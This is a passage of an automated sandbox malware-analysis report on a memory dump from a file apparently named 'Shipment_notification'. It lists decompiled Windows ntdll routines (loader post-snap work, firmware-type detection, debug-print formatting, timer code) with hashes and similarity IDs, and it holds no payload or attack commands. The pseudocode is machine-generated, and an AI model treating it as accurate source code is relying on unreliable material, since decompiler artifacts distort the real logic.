                                                                                												__eflags =  *((intOrPtr*)(0x1bd5c60 + _t103 * 8)) - _t151;
                                                                                												if( *((intOrPtr*)(0x1bd5c60 + _t103 * 8)) == _t151) {
                                                                                													break;
                                                                                												}
                                                                                												_t103 = _t103 + 1;
                                                                                												__eflags = _t103 - 5;
                                                                                												if(_t103 < 5) {
                                                                                													continue;
                                                                                												}
                                                                                												L21:
                                                                                												_t105 = E01B2F380(_t136, 0x1ac1184, 0x10);
                                                                                												__eflags = _t105;
                                                                                												if(_t105 != 0) {
                                                                                													__eflags =  *_t157 -  *_v16;
                                                                                													if( *_t157 >=  *_v16) {
                                                                                														goto L22;
                                                                                													} else {
                                                                                														asm("cdq");
                                                                                														_t166 = _t157[5] & 0x0000ffff;
                                                                                														_t108 = _t157[5] & 0x0000ffff;
                                                                                														asm("cdq");
                                                                                														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                                														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                                														if(__eflags > 0) {
                                                                                															L29:
                                                                                															E01B02280(_t108, 0x1bd86cc);
                                                                                															 *_t118 =  *_t118 + 1;
                                                                                															_t42 = _t118 + 0x40; // 0x3f
                                                                                															_t156 = _t42;
                                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                                															asm("movsd");
                                                                                															asm("movsd");
                                                                                															asm("movsd");
                                                                                															asm("movsd");
                                                                                															_t110 = E01B161A0( &_v32);
                                                                                															__eflags = _t110;
                                                                                															if(_t110 != 0) {
                                                                                																__eflags = _v32 | _v28;
                                                                                																if((_v32 | _v28) != 0) {
                                                                                																	_t134 = _v20;
                                                                                																	L55:
                                                                                																	E01BB9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                                																}
                                                                                															}
                                                                                															L30:
                                                                                															 *_t118 =  *_t118 + 1;
                                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                                															E01AFFFB0(_t118, _t156, 0x1bd86cc);
                                                                                															goto L22;
                                                                                														} else {
                                                                                															if(__eflags < 0) {
                                                                                																goto L22;
                                                                                															} else {
                                                                                																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                                																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                                																	goto L22;
                                                                                																} else {
                                                                                																	goto L29;
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                													goto L56;
                                                                                												}
                                                                                												goto L22;
                                                                                											}
                                                                                											asm("lock inc dword [eax]");
                                                                                											goto L21;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						return _t143;
                                                                                					}
                                                                                				} else {
                                                                                					_push( &_v8);
                                                                                					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                                					_push(__ecx + 0x40);
                                                                                					_push(_t121);
                                                                                					_push(0xffffffff);
                                                                                					_t80 = E01B29A00();
                                                                                					_t159 = _t80;
                                                                                					if(_t159 < 0) {
                                                                                						L8:
                                                                                						return _t80;
                                                                                					} else {
                                                                                						goto L2;
                                                                                					}
                                                                                				}
                                                                                				L56:
                                                                                			}

                                                                                Strings
                                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01B49C18
                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01B49C28
                                                                                • LdrpDoPostSnapWork, xrefs: 01B49C1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                • API String ID: 2994545307-1948996284
                                                                                • Opcode ID: f46834ee9a887c33803c0f8b1df018ea4313a217f6b11261d64418ba6c2d31c3
                                                                                • Instruction ID: 863e366167256e04a3bf00b7eca7da8d32da32b4bc0363734ce587e3125ec918
                                                                                • Opcode Fuzzy Hash: f46834ee9a887c33803c0f8b1df018ea4313a217f6b11261d64418ba6c2d31c3
                                                                                • Instruction Fuzzy Hash: 4E91F131A00216ABEF29DF99D480ABABBB5FF44354F1541ADFA05AB251E734E901CBD0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E01B651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				signed short* _t63;
                                                                                				signed int _t64;
                                                                                				signed int _t65;
                                                                                				signed int _t67;
                                                                                				intOrPtr _t74;
                                                                                				intOrPtr _t84;
                                                                                				intOrPtr _t88;
                                                                                				intOrPtr _t94;
                                                                                				void* _t100;
                                                                                				void* _t103;
                                                                                				intOrPtr _t105;
                                                                                				signed int _t106;
                                                                                				short* _t108;
                                                                                				signed int _t110;
                                                                                				signed int _t113;
                                                                                				signed int* _t115;
                                                                                				signed short* _t117;
                                                                                				void* _t118;
                                                                                				void* _t119;
                                                                                
                                                                                				_push(0x80);
                                                                                				_push(0x1bc05f0);
                                                                                				E01B3D0E8(__ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                                				_t115 =  *(_t118 + 0xc);
                                                                                				 *(_t118 - 0x7c) = _t115;
                                                                                				 *((char*)(_t118 - 0x65)) = 0;
                                                                                				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                				_t113 = 0;
                                                                                				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                                				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                                				_t100 = __ecx;
                                                                                				if(_t100 == 0) {
                                                                                					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                					E01AFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                					 *((char*)(_t118 - 0x65)) = 1;
                                                                                					_t63 =  *(_t118 - 0x90);
                                                                                					_t101 = _t63[2];
                                                                                					_t64 =  *_t63 & 0x0000ffff;
                                                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                					L20:
                                                                                					_t65 = _t64 >> 1;
                                                                                					L21:
                                                                                					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                                					if(_t108 == 0) {
                                                                                						L27:
                                                                                						 *_t115 = _t65 + 1;
                                                                                						_t67 = 0xc0000023;
                                                                                						L28:
                                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                                						L29:
                                                                                						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                                						E01B653CA(0);
                                                                                						return E01B3D130(0, _t113, _t115);
                                                                                					}
                                                                                					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                                						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                                							 *_t108 = 0;
                                                                                						}
                                                                                						goto L27;
                                                                                					}
                                                                                					 *_t115 = _t65;
                                                                                					_t115 = _t65 + _t65;
                                                                                					E01B2F3E0(_t108, _t101, _t115);
                                                                                					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                                					_t67 = 0;
                                                                                					goto L28;
                                                                                				}
                                                                                				_t103 = _t100 - 1;
                                                                                				if(_t103 == 0) {
                                                                                					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                                					_t74 = E01B03690(1, _t117, 0x1ac1810, _t118 - 0x74);
                                                                                					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                                					_t101 = _t117[2];
                                                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                					if(_t74 < 0) {
                                                                                						_t64 =  *_t117 & 0x0000ffff;
                                                                                						_t115 =  *(_t118 - 0x7c);
                                                                                						goto L20;
                                                                                					}
                                                                                					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                                					_t115 =  *(_t118 - 0x7c);
                                                                                					goto L21;
                                                                                				}
                                                                                				if(_t103 == 1) {
                                                                                					_t105 = 4;
                                                                                					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                                					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                                					_push(_t118 - 0x70);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_push(_t105);
                                                                                					_push(_t118 - 0x78);
                                                                                					_push(0x6b);
                                                                                					 *((intOrPtr*)(_t118 - 0x64)) = E01B2AA90();
                                                                                					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                					_t113 = L01B04620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                                					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                                					if(_t113 != 0) {
                                                                                						_push(_t118 - 0x70);
                                                                                						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                                						_push(_t113);
                                                                                						_push(4);
                                                                                						_push(_t118 - 0x78);
                                                                                						_push(0x6b);
                                                                                						_t84 = E01B2AA90();
                                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                                						if(_t84 < 0) {
                                                                                							goto L29;
                                                                                						}
                                                                                						_t110 = 0;
                                                                                						_t106 = 0;
                                                                                						while(1) {
                                                                                							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                                							 *(_t118 - 0x88) = _t106;
                                                                                							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                                								break;
                                                                                							}
                                                                                							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                                							_t106 = _t106 + 1;
                                                                                						}
                                                                                						_t88 = E01B6500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                                						_t119 = _t119 + 0x1c;
                                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                                						if(_t88 < 0) {
                                                                                							goto L29;
                                                                                						}
                                                                                						_t101 = _t118 - 0x3c;
                                                                                						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                                						goto L21;
                                                                                					}
                                                                                					_t67 = 0xc0000017;
                                                                                					goto L28;
                                                                                				}
                                                                                				_push(0);
                                                                                				_push(0x20);
                                                                                				_push(_t118 - 0x60);
                                                                                				_push(0x5a);
                                                                                				_t94 = E01B29860();
                                                                                				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                                				if(_t94 < 0) {
                                                                                					goto L29;
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                                					_t101 = L"Legacy";
                                                                                					_push(6);
                                                                                				} else {
                                                                                					_t101 = L"UEFI";
                                                                                					_push(4);
                                                                                				}
                                                                                				_pop(_t65);
                                                                                				goto L21;
                                                                                			}























                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: Legacy$UEFI
                                                                                • API String ID: 2994545307-634100481
                                                                                • Opcode ID: f0869b056233337e6633a3384a428d9bf5d9b62b00231e7046d3e134a581ce1b
                                                                                • Instruction ID: e7a535fd99852cb73561487562b5b1855b0835a17e95886fa770f66937721177
                                                                                • Opcode Fuzzy Hash: f0869b056233337e6633a3384a428d9bf5d9b62b00231e7046d3e134a581ce1b
                                                                                • Instruction Fuzzy Hash: D7518171E007199FDB29DFA8C880AADBBF8FF58B40F1440ADE64AEB251D7759910CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E01AEB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                                				signed int _t65;
                                                                                				signed short _t69;
                                                                                				intOrPtr _t70;
                                                                                				signed short _t85;
                                                                                				void* _t86;
                                                                                				signed short _t89;
                                                                                				signed short _t91;
                                                                                				intOrPtr _t92;
                                                                                				intOrPtr _t97;
                                                                                				intOrPtr* _t98;
                                                                                				signed short _t99;
                                                                                				signed short _t101;
                                                                                				void* _t102;
                                                                                				char* _t103;
                                                                                				signed short _t104;
                                                                                				intOrPtr* _t110;
                                                                                				void* _t111;
                                                                                				void* _t114;
                                                                                				intOrPtr* _t115;
                                                                                
                                                                                				_t109 = __esi;
                                                                                				_t108 = __edi;
                                                                                				_t106 = __edx;
                                                                                				_t95 = __ebx;
                                                                                				_push(0x90);
                                                                                				_push(0x1bbf7a8);
                                                                                				E01B3D0E8(__ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                                				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                                				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                                				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                                				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                                				if(__edx == 0xffffffff) {
                                                                                					L6:
                                                                                					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                                					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                                					__eflags = _t65 & 0x00000002;
                                                                                					if((_t65 & 0x00000002) != 0) {
                                                                                						L3:
                                                                                						L4:
                                                                                						return E01B3D130(_t95, _t108, _t109);
                                                                                					}
                                                                                					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                                					_t108 = 0;
                                                                                					_t109 = 0;
                                                                                					_t95 = 0;
                                                                                					__eflags = 0;
                                                                                					while(1) {
                                                                                						__eflags = _t95 - 0x200;
                                                                                						if(_t95 >= 0x200) {
                                                                                							break;
                                                                                						}
                                                                                						E01B2D000(0x80);
                                                                                						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                                						_t108 = _t115;
                                                                                						_t95 = _t95 - 0xffffff80;
                                                                                						_t17 = _t114 - 4;
                                                                                						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                                						__eflags =  *_t17;
                                                                                						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                						_t102 = _t110 + 1;
                                                                                						do {
                                                                                							_t85 =  *_t110;
                                                                                							_t110 = _t110 + 1;
                                                                                							__eflags = _t85;
                                                                                						} while (_t85 != 0);
                                                                                						_t111 = _t110 - _t102;
                                                                                						_t21 = _t95 - 1; // -129
                                                                                						_t86 = _t21;
                                                                                						__eflags = _t111 - _t86;
                                                                                						if(_t111 > _t86) {
                                                                                							_t111 = _t86;
                                                                                						}
                                                                                						E01B2F3E0(_t108, _t106, _t111);
                                                                                						_t115 = _t115 + 0xc;
                                                                                						_t103 = _t111 + _t108;
                                                                                						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                                						_t89 = _t95 - _t111;
                                                                                						__eflags = _t89;
                                                                                						_push(0);
                                                                                						if(_t89 == 0) {
                                                                                							L15:
                                                                                							_t109 = 0xc000000d;
                                                                                							goto L16;
                                                                                						} else {
                                                                                							__eflags = _t89 - 0x7fffffff;
                                                                                							if(_t89 <= 0x7fffffff) {
                                                                                								L16:
                                                                                								 *(_t114 - 0x94) = _t109;
                                                                                								__eflags = _t109;
                                                                                								if(_t109 < 0) {
                                                                                									__eflags = _t89;
                                                                                									if(_t89 != 0) {
                                                                                										 *_t103 = 0;
                                                                                									}
                                                                                									L26:
                                                                                									 *(_t114 - 0xa0) = _t109;
                                                                                									 *(_t114 - 4) = 0xfffffffe;
                                                                                									__eflags = _t109;
                                                                                									if(_t109 >= 0) {
                                                                                										L31:
                                                                                										_t98 = _t108;
                                                                                										_t39 = _t98 + 1; // 0x1
                                                                                										_t106 = _t39;
                                                                                										do {
                                                                                											_t69 =  *_t98;
                                                                                											_t98 = _t98 + 1;
                                                                                											__eflags = _t69;
                                                                                										} while (_t69 != 0);
                                                                                										_t99 = _t98 - _t106;
                                                                                										__eflags = _t99;
                                                                                										L34:
                                                                                										_t70 =  *[fs:0x30];
                                                                                										__eflags =  *((char*)(_t70 + 2));
                                                                                										if( *((char*)(_t70 + 2)) != 0) {
                                                                                											L40:
                                                                                											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                                											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                                											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                                											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                                											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                                											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                                											 *(_t114 - 4) = 1;
                                                                                											_push(_t114 - 0x74);
                                                                                											L01B3DEF0(_t99, _t106);
                                                                                											 *(_t114 - 4) = 0xfffffffe;
                                                                                											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                											goto L3;
                                                                                										}
                                                                                										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                                										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                                											goto L40;
                                                                                										}
                                                                                										_push( *((intOrPtr*)(_t114 + 8)));
                                                                                										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                                										_push(_t99 & 0x0000ffff);
                                                                                										_push(_t108);
                                                                                										_push(1);
                                                                                										_t101 = E01B2B280();
                                                                                										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                                										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                                											__eflags = _t101 - 0x80000003;
                                                                                											if(_t101 == 0x80000003) {
                                                                                												E01B2B7E0(1);
                                                                                												_t101 = 0;
                                                                                												__eflags = 0;
                                                                                											}
                                                                                										}
                                                                                										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                										goto L4;
                                                                                									}
                                                                                									__eflags = _t109 - 0x80000005;
                                                                                									if(_t109 == 0x80000005) {
                                                                                										continue;
                                                                                									}
                                                                                									break;
                                                                                								}
                                                                                								 *(_t114 - 0x90) = 0;
                                                                                								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                                								_t91 = E01B2E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                                								_t115 = _t115 + 0x10;
                                                                                								_t104 = _t91;
                                                                                								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                                								__eflags = _t104;
                                                                                								if(_t104 < 0) {
                                                                                									L21:
                                                                                									_t109 = 0x80000005;
                                                                                									 *(_t114 - 0x90) = 0x80000005;
                                                                                									L22:
                                                                                									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                                									L23:
                                                                                									 *(_t114 - 0x94) = _t109;
                                                                                									goto L26;
                                                                                								}
                                                                                								__eflags = _t104 - _t92;
                                                                                								if(__eflags > 0) {
                                                                                									goto L21;
                                                                                								}
                                                                                								if(__eflags == 0) {
                                                                                									goto L22;
                                                                                								}
                                                                                								goto L23;
                                                                                							}
                                                                                							goto L15;
                                                                                						}
                                                                                					}
                                                                                					__eflags = _t109;
                                                                                					if(_t109 >= 0) {
                                                                                						goto L31;
                                                                                					}
                                                                                					__eflags = _t109 - 0x80000005;
                                                                                					if(_t109 != 0x80000005) {
                                                                                						goto L31;
                                                                                					}
                                                                                					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                                					_t38 = _t95 - 1; // -129
                                                                                					_t99 = _t38;
                                                                                					goto L34;
                                                                                				}
                                                                                				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                					__eflags = __edx - 0x65;
                                                                                					if(__edx != 0x65) {
                                                                                						goto L2;
                                                                                					}
                                                                                					goto L6;
                                                                                				}
                                                                                				L2:
                                                                                				_push( *((intOrPtr*)(_t114 + 8)));
                                                                                				_push(_t106);
                                                                                				if(E01B2A890() != 0) {
                                                                                					goto L6;
                                                                                				}
                                                                                				goto L3;
                                                                                			}

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: _vswprintf_s
                                                                                • String ID:
                                                                                • API String ID: 677850445-0
                                                                                • Opcode ID: d7e8d998d020d0ba1dd1176a17170f8cfe5ff2923bd118b7d92147274ee8a832
                                                                                • Instruction ID: 5e936835a6c55a7f5291e713a6794c403146a26d608932b4367c94d665cb60e9
                                                                                • Opcode Fuzzy Hash: d7e8d998d020d0ba1dd1176a17170f8cfe5ff2923bd118b7d92147274ee8a832
                                                                                • Instruction Fuzzy Hash: BD51D075D002698FEF29CF68C845BAEBBB0FF04710F1082EDD859AB282D7704955EB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 76%
                                                                                			E01B0B944(signed int* __ecx, char __edx) {
                                                                                				signed int _v8;
                                                                                				signed int _v16;
                                                                                				signed int _v20;
                                                                                				char _v28;
                                                                                				signed int _v32;
                                                                                				char _v36;
                                                                                				signed int _v40;
                                                                                				intOrPtr _v44;
                                                                                				signed int* _v48;
                                                                                				signed int _v52;
                                                                                				signed int _v56;
                                                                                				intOrPtr _v60;
                                                                                				intOrPtr _v64;
                                                                                				intOrPtr _v68;
                                                                                				intOrPtr _v72;
                                                                                				intOrPtr _v76;
                                                                                				char _v77;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr* _t65;
                                                                                				intOrPtr _t67;
                                                                                				intOrPtr _t68;
                                                                                				char* _t73;
                                                                                				intOrPtr _t77;
                                                                                				intOrPtr _t78;
                                                                                				signed int _t82;
                                                                                				intOrPtr _t83;
                                                                                				void* _t87;
                                                                                				char _t88;
                                                                                				intOrPtr* _t89;
                                                                                				intOrPtr _t91;
                                                                                				void* _t97;
                                                                                				intOrPtr _t100;
                                                                                				void* _t102;
                                                                                				void* _t107;
                                                                                				signed int _t108;
                                                                                				intOrPtr* _t112;
                                                                                				void* _t113;
                                                                                				intOrPtr* _t114;
                                                                                				intOrPtr _t115;
                                                                                				intOrPtr _t116;
                                                                                				intOrPtr _t117;
                                                                                				signed int _t118;
                                                                                				void* _t130;
                                                                                
                                                                                				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                                				_v8 =  *0x1bdd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                                				_t112 = __ecx;
                                                                                				_v77 = __edx;
                                                                                				_v48 = __ecx;
                                                                                				_v28 = 0;
                                                                                				_t5 = _t112 + 0xc; // 0x575651ff
                                                                                				_t105 =  *_t5;
                                                                                				_v20 = 0;
                                                                                				_v16 = 0;
                                                                                				if(_t105 == 0) {
                                                                                					_t50 = _t112 + 4; // 0x5de58b5b
                                                                                					_t60 =  *__ecx |  *_t50;
                                                                                					if(( *__ecx |  *_t50) != 0) {
                                                                                						 *__ecx = 0;
                                                                                						__ecx[1] = 0;
                                                                                						if(E01B07D50() != 0) {
                                                                                							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                						} else {
                                                                                							_t65 = 0x7ffe0386;
                                                                                						}
                                                                                						if( *_t65 != 0) {
                                                                                							E01BB8CD6(_t112);
                                                                                						}
                                                                                						_push(0);
                                                                                						_t52 = _t112 + 0x10; // 0x778df98b
                                                                                						_push( *_t52);
                                                                                						_t60 = L01B29E20();
                                                                                					}
                                                                                					L20:
                                                                                					_pop(_t107);
                                                                                					_pop(_t113);
                                                                                					_pop(_t87);
                                                                                					return L01B2B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                                				}
                                                                                				_t8 = _t112 + 8; // 0x8b000cc2
                                                                                				_t67 =  *_t8;
                                                                                				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                                				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                                				_t108 =  *(_t67 + 0x14);
                                                                                				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                                				_t105 = 0x2710;
                                                                                				asm("sbb eax, edi");
                                                                                				_v44 = _t88;
                                                                                				_v52 = _t108;
                                                                                				_t60 = L01B2CE00(_t97, _t68, 0x2710, 0);
                                                                                				_v56 = _t60;
                                                                                				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                                					L3:
                                                                                					 *(_t112 + 0x44) = _t60;
                                                                                					_t105 = _t60 * 0x2710 >> 0x20;
                                                                                					 *_t112 = _t88;
                                                                                					 *(_t112 + 4) = _t108;
                                                                                					_v20 = _t60 * 0x2710;
                                                                                					_v16 = _t60 * 0x2710 >> 0x20;
                                                                                					if(_v77 != 0) {
                                                                                						L16:
                                                                                						_v36 = _t88;
                                                                                						_v32 = _t108;
                                                                                						if(E01B07D50() != 0) {
                                                                                							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                						} else {
                                                                                							_t73 = 0x7ffe0386;
                                                                                						}
                                                                                						if( *_t73 != 0) {
                                                                                							_t105 = _v40;
                                                                                							E01BB8F6A(_t112, _v40, _t88, _t108);
                                                                                						}
                                                                                						_push( &_v28);
                                                                                						_push(0);
                                                                                						_push( &_v36);
                                                                                						_t48 = _t112 + 0x10; // 0x778df98b
                                                                                						_push( *_t48);
                                                                                						_t60 = E01B2AF60();
                                                                                						goto L20;
                                                                                					} else {
                                                                                						_t89 = 0x7ffe03b0;
                                                                                						do {
                                                                                							_t114 = 0x7ffe0010;
                                                                                							do {
                                                                                								_t77 =  *0x1bd8628; // 0x0
                                                                                								_v68 = _t77;
                                                                                								_t78 =  *0x1bd862c; // 0x0
                                                                                								_v64 = _t78;
                                                                                								_v72 =  *_t89;
                                                                                								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                                								while(1) {
                                                                                									_t105 =  *0x7ffe000c;
                                                                                									_t100 =  *0x7ffe0008;
                                                                                									if(_t105 ==  *_t114) {
                                                                                										goto L8;
                                                                                									}
                                                                                									asm("pause");
                                                                                								}
                                                                                								L8:
                                                                                								_t89 = 0x7ffe03b0;
                                                                                								_t115 =  *0x7ffe03b0;
                                                                                								_t82 =  *0x7FFE03B4;
                                                                                								_v60 = _t115;
                                                                                								_t114 = 0x7ffe0010;
                                                                                								_v56 = _t82;
                                                                                							} while (_v72 != _t115 || _v76 != _t82);
                                                                                							_t83 =  *0x1bd8628; // 0x0
                                                                                							_t116 =  *0x1bd862c; // 0x0
                                                                                							_v76 = _t116;
                                                                                							_t117 = _v68;
                                                                                						} while (_t117 != _t83 || _v64 != _v76);
                                                                                						asm("sbb edx, [esp+0x24]");
                                                                                						_t102 = _t100 - _v60 - _t117;
                                                                                						_t112 = _v48;
                                                                                						_t91 = _v44;
                                                                                						asm("sbb edx, eax");
                                                                                						_t130 = _t105 - _v52;
                                                                                						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                                							_t88 = _t102 - _t91;
                                                                                							asm("sbb edx, edi");
                                                                                							_t108 = _t105;
                                                                                						} else {
                                                                                							_t88 = 0;
                                                                                							_t108 = 0;
                                                                                						}
                                                                                						goto L16;
                                                                                					}
                                                                                				} else {
                                                                                					if( *(_t112 + 0x44) == _t60) {
                                                                                						goto L20;
                                                                                					}
                                                                                					goto L3;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B0B9A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 885266447-0
                                                                                • Opcode ID: 4a87b791d0536f3dcd5a59ab1cd529c45a241d01039f16dbc06c42569199ee50
                                                                                • Instruction ID: d8afcc33dc336cc0908dd9e58a6e17da66257148e3abb064d76156812a9adf29
                                                                                • Opcode Fuzzy Hash: 4a87b791d0536f3dcd5a59ab1cd529c45a241d01039f16dbc06c42569199ee50
                                                                                • Instruction Fuzzy Hash: 86516C75608301CFC72ADF69C180A2ABFE5FB88610F1449AEF99587395DB30E844CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
